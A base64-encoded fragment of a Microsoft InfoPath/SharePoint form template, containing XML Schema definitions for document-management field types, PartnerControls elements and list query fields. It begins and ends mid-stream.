WF4T2NjdXJzPSJ1bmJvdW5kZWQiIG5hbWVzcGFjZT0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCIgcHJvY2Vzc0NvbnRlbnRzPSJsYXgiLz4NCgkJPC94c2Q6c2VxdWVuY2U+DQoJPC94c2Q6Y29tcGxleFR5cGU+DQoJPHhzZDpjb21wbGV4VHlwZSBuYW1lPSJOb3RlUGxhaW5BcHBlbmRUeXBlIj4NCgkJPHhzZDpzZXF1ZW5jZT4NCgkJCTx4c2Q6ZWxlbWVudCBuYW1lPSJWYWx1ZSIgdHlwZT0iZG1zOk5vdGVQbGFpblR5cGUiIG1pbk9jY3Vycz0iMCIgbWF4T2NjdXJzPSIxIi8+DQoJCQk8eHNkOmVsZW1lbnQgbmFtZT0iSGlzdG9yeSIgdHlwZT0iZG1zOkFwcGVuZE9ubHlQbGFpblR5cGUiIG1pbk9jY3Vycz0iMCIgbWF4T2NjdXJzPSJ1bmJvdW5kZWQiLz4NCgkJPC94c2Q6c2VxdWVuY2U+DQoJPC94c2Q6Y29tcGxleFR5cGU+DQoJPHhzZDpjb21wbGV4VHlwZSBuYW1lPSJOb3RlUGxhaW5SZXF1aXJlZEFwcGVuZFR5cGUiPg0KCQk8eHNkOnNlcXVlbmNlPg0KCQkJPHhzZDplbGVtZW50IG5hbWU9IlZhbHVlIiBtaW5PY2N1cnM9IjAiIG1heE9jY3Vycz0iMSI+DQoJCQkJPHNpbXBsZVR5cGUgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIj4NCgkJCQkJPHhzZDpyZXN0cmljdGlvbiBiYXNlPSJkbXM6Tm90ZVBsYWluVHlwZSI+DQoJCQkJCQk8eHNkOm1pbkxlbmd0aCB2YWx1ZT0iMSIvPg0KCQkJCQk8L3hzZDpyZXN0cmljdGlvbj4NCgkJCQk8L3NpbXBsZVR5cGU+DQoJCQk8L3hzZDplbGVtZW50Pg0KCQkJPHhzZDplbGVtZW50IG5hbWU9Ikhpc3RvcnkiIHR5cGU9ImRtczpBcHBlbmRPbmx5UGxhaW5UeXBlIiBtaW5PY2N1cnM9IjAiIG1heE9jY3Vycz0idW5ib3VuZGVkIi8+DQoJCTwveHNkOnNlcXVlbmNlPg0KCTwveHNkOmNvbXBsZXhUeXBlPg0KCTx4c2Q6Y29tcGxleFR5cGUgbmFtZT0iTm90ZVJpY2hBcHBlbmRUeXBlIj4NCgkJPHhzZDpzZXF1ZW5jZT4NCgkJCTx4c2Q6ZWxlbWVudCBuYW1lPSJWYWx1ZSIgdHlwZT0iZG1zOk5vdGVSaWNoVHlwZSIgbWluT2NjdXJzPSIwIiBtYXhPY2N1cnM9IjEiLz4NCgkJCTx4c2Q6ZWxlbWVudCBuYW1lPSJIaXN0b3J5IiB0eXBlPSJkbXM6QXBwZW5kT25seVJpY2hUeXBlIiBtaW5PY2N1cnM9IjAiIG1heE9jY3Vycz0idW5ib3VuZGVkIi8+DQoJCTwveHNkOnNlcXVlbmNlPg0KCTwveHNkOmNvbXBsZXhUeXBlPg0KCTx4c2Q6Y29tcGxleFR5cGUgbmFtZT0iTm90ZUVuaGFuY2VkQXBwZW5kVHlwZSI+DQoJCTx4c2Q6c2VxdWVuY2U+DQoJCQk8eHNkOmVsZW1lbnQgbmFtZT0iVmFsdWUiIHR5cGU9ImRtczpOb3RlRW5oYW5jZWRUeXBlIiBtaW5PY2N1cnM9IjAiIG1heE9jY3Vycz0iMSIvPg0KCQkJPHhzZDplbGVtZW50IG5hbWU9Ikhpc3RvcnkiIHR5cGU9ImRtczpBcHBlbmRPbmx5RW5oYW5jZWRUeXBlIiBtaW5PY2N1cnM9IjAiIG1heE9jY3Vycz0idW5ib3VuZGVkIi8+DQoJCTwveHNkOnNlcXVlbmNlPg0KCTwveHNkOmNvbXBsZXhUeXBlPg0KCTx4c2Q6Y29tcGxleFR5cGUgbmFtZT0iQXBwZW5kT25seVBsYWluVHlwZSI+DQoJCTx4c2Q6c2VxdWVuY2U+DQoJCQk8eHNkOmVsZW1lbnQgbmFtZT0iTmFtZSIgdHlwZT0ieHNkOnN0cmluZyIgbWluT2NjdXJzPSIxIiBtYXhPY2N1cnM9IjEiIG1hOnJlYWRPbmx5PSJ0cnVlIi8+DQoJCQk8eHNkOmVsZW1lbnQgbmFtZT0iRGF0ZVRpbWUiIHR5cGU9InhzZDpkYXRlVGltZSIgbWluT2NjdXJzPSIxIiBtYXhPY2N1cnM9IjEiIG5pbGxhYmxlPSJ0cnVlIiBtYTpyZWFkT25seT0idHJ1ZSIvPg0KCQkJPHhzZDplbGVtZW50IG5hbWU9Ikhpc3RvcnlWYWx1ZSIgdHlwZT0iZG1zOk5vdGVQbGFpblR5cGUiIG1pbk9jY3Vycz0iMSIgbWF4T2NjdXJzPSIxIiBtYTpyZWFkT25seT0idHJ1ZSIgbWE6Zm9ybWF0U3BlYz0icGxhaW5NdWx0aWxpbmUiIG1hOmZvcm1hdENhdGVnb3J5PSJzdHJpbmciLz4NCgkJPC94c2Q6c2VxdWVuY2U+DQoJPC94c2Q6Y29tcGxleFR5cGU+DQoJPHhzZDpjb21wbGV4VHlwZSBuYW1lPSJBcHBlbmRPbmx5UmljaFR5cGUiPg0KCQk8eHNkOnNlcXVlbmNlPg0KCQkJPHhzZDplbGVtZW50IG5hbWU9Ik5hbWUiIHR5cGU9InhzZDpzdHJpbmciIG1pbk9jY3Vycz0iMSIgbWF4T2NjdXJzPSIxIiBtYTpyZWFkT25seT0idHJ1ZSIvPg0KCQkJPHhzZDplbGVtZW50IG5hbWU9IkRhdGVUaW1lIiB0eXBlPSJ4c2Q6ZGF0ZVRpbWUiIG1pbk9jY3Vycz0iMSIgbWF4T2NjdXJzPSIxIiBuaWxsYWJsZT0idHJ1ZSIgbWE6cmVhZE9ubHk9InRydWUiLz4NCgkJCTx4c2Q6ZWxlbWVudCBuYW1lPSJIaXN0b3J5VmFsdWUiIHR5cGU9ImRtczpOb3RlUmljaFR5cGUiIG1pbk9jY3Vycz0iMSIgbWF4T2NjdXJzPSIxIiBtYTpyZWFkT25seT0idHJ1ZSIvPg0KCQk8L3hzZDpzZXF1ZW5jZT4NCgk8L3hzZDpjb21wbGV4VHlwZT4NCgk8eHNkOmNvbXBsZXhUeXBlIG5hbWU9IkFwcGVuZE9ubHlFbmhhbmNlZFR5cGUiPg0KCQk8eHNkOnNlcXVlbmNlPg0KCQkJPHhzZDplbGVtZW50IG5hbWU9Ik5hbWUiIHR5cGU9InhzZDpzdHJpbmciIG1pbk9jY3Vycz0iMSIgbWF4T2NjdXJzPSIxIiBtYTpyZWFkT25seT0idHJ1ZSIvPg0KCQkJPHhzZDplbGVtZW50IG5hbWU9IkRhdGVUaW1lIiB0eXBlPSJ4c2Q6ZGF0ZVRpbWUiIG1pbk9jY3Vycz0iMSIgbWF4T2NjdXJzPSIxIiBuaWxsYWJsZT0idHJ1ZSIgbWE6cmVhZE9ubHk9InRydWUiLz4NCgkJCTx4c2Q6ZWxlbWVudCBuYW1lPSJIaXN0b3J5VmFsdWUiIHR5cGU9ImRtczpOb3RlRW5oYW5jZWRUeXBlIiBtaW5PY2N1cnM9IjEiIG1heE9jY3Vycz0iMSIgbWE6cmVhZE9ubHk9InRydWUiLz4NCgkJPC94c2Q6c2VxdWVuY2U+DQoJPC94c2Q6Y29tcGxleFR5cGU+DQoJPHhzZDpjb21wbGV4VHlwZSBuYW1lPSJVc2VyVHlwZSI+DQoJCTx4c2Q6c2VxdWVuY2U+DQoJCQk8eHNkOmVsZW1lbnQgcmVmPSJwYzpQZXJzb24iIG1pbk9jY3Vycz0iMCIgbWF4T2NjdXJzPSJ1bmJvdW5kZWQiLz4NCgkJPC94c2Q6c2VxdWVuY2U+DQoJPC94c2Q6Y29tcGxleFR5cGU+DQoJPHhzZDpjb21wbGV4VHlwZSBuYW1lPSJNdWx0aVVzZXJUeXBlIj4NCgkJPHhzZDpzZXF1ZW5jZT4NCgkJCTx4c2Q6ZWxlbWVudCByZWY9InBjOlBlcnNvbiIgbWluT2NjdXJzPSIwIiBtYXhPY2N1cnM9InVuYm91bmRlZCIvPg0KCQk8L3hzZDpzZXF1ZW5jZT4NCgk8L3hzZDpjb21wbGV4VHlwZT4NCgk8eHNkOmNvbXBsZXhUeXBlIG5hbWU9IlRheG9ub215RmllbGRUeXBlIj4NCgkJPHhzZDpzZXF1ZW5jZT4NCgkJCTx4c2Q6ZWxlbWVudCByZWY9InBjOlRlcm1zIiBtaW5PY2N1cnM9IjAiIG1heE9jY3Vycz0iMSIvPg0KCQk8L3hzZDpzZXF1ZW5jZT4NCgk8L3hzZDpjb21wbGV4VHlwZT4NCgk8eHNkOmNvbXBsZXhUeXBlIG5hbWU9IlRheG9ub215RmllbGRNdWx0aVR5cGUiPg0KCQk8eHNkOnNlcXVlbmNlPg0KCQkJPHhzZDplbGVtZW50IHJlZj0icGM6VGVybXMiIG1pbk9jY3Vycz0iMCIgbWF4T2NjdXJzPSIxIi8+DQoJCTwveHNkOnNlcXVlbmNlPg0KCTwveHNkOmNvbXBsZXhUeXBlPg0KCTx4c2Q6Y29tcGxleFR5cGUgbmFtZT0iQXR0YWNobWVudHNUeXBlIj4NCgkJPHhzZDpzZXF1ZW5jZT4NCgkJCTx4c2Q6ZWxlbWVudCBuYW1lPSJhdHRhY2htZW50VVJMIiB0eXBlPSJ4c2Q6YW55VVJJIiBuaWxsYWJsZT0idHJ1ZSIgbWluT2NjdXJzPSIwIiBtYXhPY2N1cnM9InVuYm91bmRlZCIvPg0KCQk8L3hzZDpzZXF1ZW5jZT4NCgk8L3hzZDpjb21wbGV4VHlwZT4NCgk8eHNkOmNvbXBsZXhUeXBlIG5hbWU9IlVybFR5cGUiPg0KCQk8eHNkOnNpbXBsZUNvbnRlbnQ+DQoJCQk8eHNkOmV4dGVuc2lvbiBiYXNlPSJ4c2Q6YW55VVJJIj4NCgkJCQk8eHNkOmF0dHJpYnV0ZSBuYW1lPSJEZXNjcmlwdGlvbiIgdHlwZT0ieHNkOnN0cmluZyIvPg0KCQkJPC94c2Q6ZXh0ZW5zaW9uPg0KCQk8L3hzZDpzaW1wbGVDb250ZW50Pg0KCTwveHNkOmNvbXBsZXhUeXBlPg0KCTx4c2Q6Y29tcGxleFR5cGUgbmFtZT0iVXJsUmVxdWlyZWRUeXBlIj4NCgkJPHhzZDpzaW1wbGVDb250ZW50Pg0KCQkJPHhzZDpleHRlbnNpb24gYmFzZT0iZG1zOnJlcXVpcmVkQW55VVJJIj4NCgkJCQk8eHNkOmF0dHJpYnV0ZSBuYW1lPSJEZXNjcmlwdGlvbiIgdHlwZT0ieHNkOnN0cmluZyIvPg0KCQkJPC94c2Q6ZXh0ZW5zaW9uPg0KCQk8L3hzZDpzaW1wbGVDb250ZW50Pg0KCTwveHNkOmNvbXBsZXhUeXBlPg0KCTx4c2Q6Y29tcGxleFR5cGUgbmFtZT0iUGljdHVyZVR5cGUiPg0KCQk8eHNkOnNpbXBsZUNvbnRlbnQ+DQoJCQk8eHNkOmV4dGVuc2lvbiBiYXNlPSJ4c2Q6YW55VVJJIj4NCgkJCQk8eHNkOmF0dHJpYnV0ZSBuYW1lPSJEZXNjcmlwdGlvbiIgdHlwZT0ieHNkOnN0cmluZyIvPg0KCQkJPC94c2Q6ZXh0ZW5zaW9uPg0KCQk8L3hzZDpzaW1wbGVDb250ZW50Pg0KCTwveHNkOmNvbXBsZXhUeXBlPg0KCTx4c2Q6Y29tcGxleFR5cGUgbmFtZT0iUGljdHVyZVJlcXVpcmVkVHlwZSI+DQoJCTx4c2Q6c2ltcGxlQ29udGVudD4NCgkJCTx4c2Q6ZXh0ZW5zaW9uIGJhc2U9ImRtczpyZXF1aXJlZEFueVVSSSI+DQoJCQkJPHhzZDphdHRyaWJ1dGUgbmFtZT0iRGVzY3JpcHRpb24iIHR5cGU9InhzZDpzdHJpbmciLz4NCgkJCTwveHNkOmV4dGVuc2lvbj4NCgkJPC94c2Q6c2ltcGxlQ29udGVudD4NCgk8L3hzZDpjb21wbGV4VHlwZT4NCgk8eHNkOnNpbXBsZVR5cGUgbmFtZT0icmVxdWlyZWRBbnlVUkkiPg0KCQk8eHNkOnJlc3RyaWN0aW9uIGJhc2U9InhzZDphbnlVUkkiPg0KCQkJPHhzZDptaW5MZW5ndGggdmFsdWU9IjEiLz4NCgkJPC94c2Q6cmVzdHJpY3Rpb24+DQoJPC94c2Q6c2ltcGxlVHlwZT4NCgk8eHNkOnNpbXBsZVR5cGUgbmFtZT0iQmFzZTY0QmluYXJ5Ij4NCgkJPHhzZDpyZXN0cmljdGlvbiBiYXNlPSJ4c2Q6YmFzZTY0QmluYXJ5Ii8+DQoJPC94c2Q6c2ltcGxlVHlwZT4NCjwveHNkOnNjaGVtYT48P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJVVEYtOCIgc3RhbmRhbG9uZT0ibm8iPz4NCjx4c2Q6c2NoZW1hIHRhcmdldE5hbWVzcGFjZT0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwNy9QYXJ0bmVyQ29udHJvbHMiIGVsZW1lbnRGb3JtRGVmYXVsdD0icXVhbGlmaWVkIiBhdHRyaWJ1dGVGb3JtRGVmYXVsdD0idW5xdWFsaWZpZWQiIHhtbG5zOnhzZD0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiIHhtbG5zOmRtcz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvMjAwOS9kb2N1bWVudE1hbmFnZW1lbnQvdHlwZXMiIHhtbG5zOmRmcz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwMy9kYXRhRm9ybVNvbHV0aW9uIiB4bWxuczpxPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDA5L1dTU0xpc3QvcXVlcnlGaWVsZHMiIHhtbG5zOmQ9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDkvV1NTTGlzdC9kYXRhRmllbGRzIiB4bWxuczptYT0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvMjAwOS9tZXRhZGF0YS9wcm9wZXJ0aWVzL21ldGFBdHRyaWJ1dGVzIiB4bWxuczpwYz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwNy9QYXJ0bmVyQ29udHJvbHMiPg0KCTx4c2Q6ZWxlbWVudCBuYW1lPSJQZXJzb24iPg0KCQk8eHNkOmNvbXBsZXhUeXBlPg0KCQkJPHhzZDpzZXF1ZW5jZT4NCgkJCQk8eHNkOmVsZW1lbnQgcmVmPSJwYzpEaXNwbGF5TmFtZSIgbWluT2NjdXJzPSIwIi8+DQoJCQkJPHhzZDplbGVtZW50IHJlZj0icGM6QWNjb3VudElkIiBtaW5PY2N1cnM9IjAiLz4NCgkJCQk8eHNkOmVsZW1lbnQgcmVmPSJwYzpBY2NvdW50VHlwZSIgbWluT2NjdXJzPSIwIi8+DQoJCQk8L3hzZDpzZXF1ZW5jZT4NCgkJPC94c2Q6Y29tcGxleFR5cGU+DQoJPC94c2Q6ZWxlbWVudD4NCgk8eHNkOmVsZW1lbnQgbmFtZT0iRGlzcGxheU5hbWUiIHR5cGU9InhzZDpzdHJpbmciLz4NCgk8eHNkOmVsZW1lbnQgbmFtZT0iQWNjb3VudElkIiB0eXBlPSJ4c2Q6c3RyaW5nIi8+DQoJPHhzZDplbGVtZW50IG5hbWU9IkFjY291bnRUeXBlIiB0eXBlPSJ4c2Q6c3RyaW5nIi8+DQoJPHhzZDplbGVtZW50IG5hbWU9IkJEQ0Fzc29jaWF0ZWRFbnRpdHkiPg0KCQk8eHNkOmNvbXBsZXhUeXBlPg0KCQkJPHhzZDpzZXF1ZW5jZT4NCgkJCQk8eHNkOmVsZW1lbnQgcmVmPSJwYzpCRENFbnRpdHkiIG1pbk9jY3Vycz0iMCIgbWF4T2NjdXJzPSJ1bmJvdW5kZWQiLz4NCgkJCTwveHNkOnNlcXVlbmNlPg0KCQkJPHhzZDphdHRyaWJ1dGUgcmVmPSJwYzpFbnRpdHlOYW1lc3BhY2UiLz4NCgkJCTx4c2Q6YXR0cmlidXRlIHJlZj0icGM6RW50aXR5TmFtZSIvPg0KCQkJPHhzZDphdHRyaWJ1dGUgcmVmPSJwYzpTeXN0ZW1JbnN0YW5jZU5hbWUiLz4NCgkJCTx4c2Q6YXR0cmlidXRlIHJlZj0icGM6QXNzb2NpYXRpb25OYW1lIi8+DQoJCTwveHNkOmNvbXBsZXhUeXBlPg0KCTwveHNkOmVsZW1lbnQ+DQoJPHhzZDphdHRyaWJ1dGUgbmFtZT0iRW50aXR5TmFtZXNwYWNlIiB0eXBlPSJ4c2Q6c3RyaW5nIi8+DQoJPHhzZDphdHRyaWJ1dGUgbmFtZT0iRW50aXR5TmFtZSIgdHlwZT0ieHNkOnN0cmluZyIvPg0KCTx4c2Q6YXR0cmlidXRlIG5hbWU9IlN5c3RlbUluc3RhbmNlTmFtZSIgdHlwZT0ieHNkOnN0cmluZyIvPg0KCTx4c2Q6YXR0cmlidXRlIG5hbWU9IkFzc29jaWF0aW9uTmFtZSIgdHlwZT0ieHNkOnN0cmluZyIvPg0KCTx4c2Q6ZWxlbWVudCBuYW1lPSJCRENFbnRpdHkiPg0KCQk8eHNkOmNvbXBsZXhUeXBlPg0KCQkJPHhzZDpzZXF1ZW5jZT4NCgkJCQk8eHNkOmVsZW1lbnQgcmVmPSJwYzpFbnRpdHlEaXNwbGF5TmFtZSIgbWluT2NjdXJzPSIwIi8+DQoJCQkJPHhzZDplbGVtZW50IHJlZj0icGM6RW50aXR5SW5zdGFuY2VSZWZlcmVuY2UiIG1pbk9jY3Vycz0iMCIvPg0KCQkJCTx4c2Q6ZWxlbWVudCByZWY9InBjOkVudGl0eUlkMSIgbWluT2NjdXJzPSIwIi8+DQoJCQkJPHhzZDplbGVtZW50IHJlZj0icGM6RW50aXR5SWQyIiBtaW5PY2N1cnM9IjAiLz4NCgkJCQk8eHNkOmVsZW1lbnQgcmVmPSJwYzpFbnRpdHlJZDMiIG1pbk9jY3Vycz0iMCIvPg0KCQkJCTx4c2Q6ZWxlbWVudCByZWY9InBjOkVudGl0eUlkNCIgbWluT2NjdXJzPSIwIi8+DQoJCQkJPHhzZDplbGVtZW50IHJlZj0icGM6RW50aXR5SWQ1IiBtaW5PY2N1cnM9IjAiLz4NCgkJCTwveHNkOnNlcXVlbmNlPg0KCQk8L3hzZDpjb21wbGV4VHlwZT4NCgk8L3hzZDplbGVtZW50Pg0KCTx4c2Q6ZWxlbWVudCBuYW1lPSJFbnRpdHlEaXNwbGF5TmFtZSIgdHlwZT0ieHNkOnN0cmluZyIvPg0KCTx4c2Q6ZWxlbWVudCBuYW1lPSJFbnRpdHlJbnN0YW5jZVJlZmVyZW5jZSIgdHlwZT0ieHNkOnN0cmluZyIvPg0KCTx4c2Q6ZWxlbWVudCBuYW1lPSJFbnRpdHlJZDEiIHR5cGU9InhzZDpzdHJpbmciLz4NCgk8eHNkOmVsZW1lbnQgbmFtZT0iRW50aXR5SWQyIiB0eXBlPSJ4c2Q6c3RyaW5nIi8+DQoJPHhzZDplbGVtZW50IG5hbWU9IkVudGl0eUlkMyIgdHlwZT0ieHNkOnN0cmluZyIvPg0KCTx4c2Q6ZWxlbWVudCBuYW1lPSJFbnRpdHlJZDQiIHR5cGU9InhzZDpzdHJpbmciLz4NCgk8eHNkOmVsZW1lbnQgbmFtZT0iRW50aXR5SWQ1IiB0eXBlPSJ4c2Q6c3RyaW5nIi8+DQoJPHhzZDplbGVtZW50IG5hbWU9IlRlcm1zIj4NCgkJPHhzZDpjb21wbGV4VHlwZT4NCgkJCTx4c2Q6c2VxdWVuY2U+DQoJCQkJPHhzZDplbGVtZW50IHJlZj0icGM6VGVybUluZm8iIG1pbk9jY3Vycz0iMCIgbWF4T2NjdXJzPSJ1bmJvdW5kZWQiLz4NCgkJCTwveHNkOnNlcXVlbmNlPg0KCQk8L3hzZDpjb21wbGV4VHlwZT4NCgk8L3hzZDplbGVtZW50Pg0KCTx4c2Q6ZWxlbWVudCBuYW1lPSJUZXJtSW5mbyI+DQoJCTx4c2Q6Y29tcGxleFR5cGU+DQoJCQk8eHNkOnNlcXVlbmNlPg0KCQkJCTx4c2Q6ZWxlbWVudCByZWY9InBjOlRlcm1OYW1lIiBtaW5PY2N1cnM9IjAiLz4NCgkJCQk8eHNkOmVsZW1lbnQgcmVmPSJwYzpUZXJtSWQiIG1pbk9jY3Vycz0iMCIvPg0KCQkJPC94c2Q6c2VxdWVuY2U+DQoJCTwveHNkOmNvbXBsZXhUeXBlPg0KCTwveHNkOmVsZW1lbnQ+DQoJPHhzZDplbGVtZW50IG5hbWU9IlRlcm1OYW1lIiB0eXBlPSJ4c2Q6c3RyaW5nIi8+DQoJPHhzZDplbGVtZW50IG5hbWU9IlRlcm1JZCIgdHlwZT0ieHNkOnN0cmluZyIvPg0KPC94c2Q6c2NoZW1hPjw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04IiBzdGFuZGFsb25lPSJubyI/Pg0KPHhzZDpzY2hlbWEgdGFyZ2V0TmFtZXNwYWNlPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDA5L1dTU0xpc3QvcXVlcnlGaWVsZHMiIGVsZW1lbnRGb3JtRGVmYXVsdD0idW5xdWFsaWZpZWQiIGF0dHJpYnV0ZUZvcm1EZWZhdWx0PSJ1bnF1YWxpZmllZCIgeG1sbnM6eHNkPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYSIgeG1sbnM6ZG1zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS8yMDA5L2RvY3VtZW50TWFuYWdlbWVudC90eXBlcyIgeG1sbnM6ZGZzPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDAzL2RhdGFGb3JtU29sdXRpb24iIHhtbG5zOnE9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDkvV1NTTGlzdC9xdWVyeUZpZWxkcyIgeG1sbnM6ZD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwOS9XU1NMaXN0L2RhdGFGaWVsZHMiIHhtbG5zOm1hPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS8yMDA5L21ldGFkYXRhL3Byb3BlcnRpZXMvbWV0YUF0dHJpYnV0ZXMiIHhtbG5zOnBjPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDA3L1BhcnRuZXJDb250cm9scyI+DQoJPHhzZDppbXBvcnQgbmFtZXNwYWNlPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS8yMDA5L2RvY3VtZW50TWFuYWdlbWVudC90eXBlcyIgc2NoZW1hTG9jYXRpb249InNjaGVtYTIueHNkIi8+DQoJPHhzZDplbGVtZW50IG5hbWU9IlNoYXJlUG9pbnRMaXN0SXRlbV9SVyI+DQoJCTx4c2Q6Y29tcGxleFR5cGU+DQoJCQk8eHNkOnNlcXVlbmNlPg0KCQkJCTx4c2Q6ZWxlbWVudCByZWY9InE6SUQiIG1pbk9jY3Vycz0iMCIvPg0KCQkJCTx4c2Q6ZWxlbWVudCByZWY9InE6VGl0bGUiIG1pbk9jY3Vycz0iMCIvPg0KCQkJCTx4c2Q6ZWxlbWVudCByZWY9InE6QXV0aG9yIiBtaW5PY2N1cnM9IjAiLz4NCgkJCQk8eHNkOmVsZW1lbnQgcmVmPSJxOkVkaXRvciIgbWluT2NjdXJzPSIwIi8+DQoJCQkJPHhzZDplbGVtZW50IHJlZj0icTpNb2RpZmllZCIgbWluT2NjdXJzPSIwIi8+DQoJCQkJPHhzZDplbGVtZW50IHJlZj0icTpDcmVhdGVkIiBtaW5PY2N1cnM9IjAiLz4NCgkJCTwveHNkOnNlcXVlbmNlPg0KCQk8L3hzZDpjb21wbGV4VHlwZT4NCgk8L3hzZDplbGVtZW50Pg0KCTx4c2Q6ZWxlbWVudCBuYW1lPSJJRCIgdHlwZT0iZG1zOkNvdW50ZXJUeXBlIiBtYTpkaXNwbGF5TmFtZT0iSUQiIG1hOnJlYWRPbmx5PSJmYWxzZSIgbmlsbGFibGU9InRydWUiLz4NCgk8eHNkOmVsZW1lbnQgbmFtZT0iVGl0bGUiIHR5cGU9ImRtczpUZXh0VHlwZSIgbWE6ZGlzcGxheU5hbWU9IlRpdGxlIiBtYTpyZWFkT25seT0iZmFsc2UiIG5pbGxhYmxlPSJ0cnVlIi8+DQoJPHhzZDplbGVtZW50IG5hbWU9IkF1dGhvciIgdHlwZT0iZG1zOlRleHRUeXBlIiBtYTpkaXNwbGF5TmFtZT0iQ3JlYXRlZCBCeSIgbWE6cmVhZE9ubHk9ImZhbHNlIiBuaWxsYWJsZT0idHJ1ZSIvPg0KCTx4c2Q6ZWxlbWVudCBuYW1lPSJFZGl0b3IiIHR5cGU9ImRtczpUZXh0VHlwZSIgbWE6ZGlzcGxheU5hbWU9Ik1vZGlmaWVkIEJ5IiBtYTpyZWFkT25seT0iZmFsc2UiIG5pbGxhYmxlPSJ0cnVlIi8+DQoJPHhzZDplbGVtZW50IG5hbWU9Ik1vZGlmaWVkIiB0eXBlPSJkbXM6RGF0ZU9ubHlUeXBlIiBtYTpkaXNwbGF5TmFtZT0iTW9kaWZpZWQiIG1hOnJlYWRPbmx5PSJmYWxzZSIgbmlsbGFibGU9InRydWUiLz4NCgk8eHNkOmVsZW1lbnQgbmFtZT0iQ3JlYXRlZCIgdHlwZT0iZG1zOkRhdGVPbmx5VHlwZSIgbWE6ZGlzcGxheU5hbWU9IkNyZWF0ZWQiIG1hOnJlYWRPbmx5PSJmYWxzZSIgbmlsbGFibGU9InRydWUiLz4NCjwveHNkOnNjaGVtYT48P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJVVEYtOCI/Pg0KPD9tc28taW5mb1BhdGhTb2x1dGlvbiBuYW1lPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOm9mZmljZTppbmZvcGF0aDpsaXN0Oi1BdXRvR2VuLTIwMjItMDUtMDFUMjI6MjM6Mjk6OTZaIiBzb2x1dGlvblZlcnNpb249IjEuMC4wLjIiIHByb2R1Y3RWZXJzaW9uPSIxNS4wLjAiIFBJVmVyc2lvbj0iMS4wLjAuMCIgPz4NCjw/bXNvLWFwcGxpY2F0aW9uIHByb2dpZD0iSW5mb1BhdGguRG9jdW1lbnQiIHZlcnNpb25Qcm9naWQ9IkluZm9QYXRoLkRvY3VtZW50LjMiPz4NCjxkZnM6bXlGaWVsZHMgeG1sbnM6eHNpPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYS1pbnN0YW5jZSIgeG1sbnM6ZGZzPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDAzL2RhdGFGb3JtU29sdXRpb24iIHhtbG5zOmQ9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDkvV1NTTGlzdC9kYXRhRmllbGRzIiB4bWxuczpwYz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwNy9QYXJ0bmVyQ29udHJvbHMiIHhtbG5zOm15PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDA5L1dTU0xpc3QvY21lRGF0YUZpZWxkcyIgeG1sbnM6bWE9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlLzIwMDkvbWV0YWRhdGEvcHJvcGVydGllcy9tZXRhQXR0cmlidXRlcyIgeG1sbnM6cT0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwOS9XU1NMaXN0L3F1ZXJ5RmllbGRzIiB4bWxuczpkbXM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlLzIwMDkvZG9jdW1lbnRNYW5hZ2VtZW50L3R5cGVzIiB4bWxuczp4ZD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwMyI+DQoJPGRmczpxdWVyeUZpZWxkcz4NCgkJPHE6U2hhcmVQb2ludExpc3RJdGVtX1JXPg0KCQkJPHE6SUQgeHNpOm5pbD0idHJ1ZSI+PC9xOklEPg0KCQkJPHE6VGl0bGUgeHNpOm5pbD0idHJ1ZSI+PC9xOlRpdGxlPg0KCQkJPHE6QXV0aG9yIHhzaTpuaWw9InRydWUiPjwvcTpBdXRob3I+DQoJCQk8cTpFZGl0b3IgeHNpOm5pbD0idHJ1ZSI+PC9xOkVkaXRvcj4NCgkJCTxxOk1vZGlmaWVkIHhzaTpuaWw9InRydWUiPjwvcTpNb2RpZmllZD4NCgkJCTxxOkN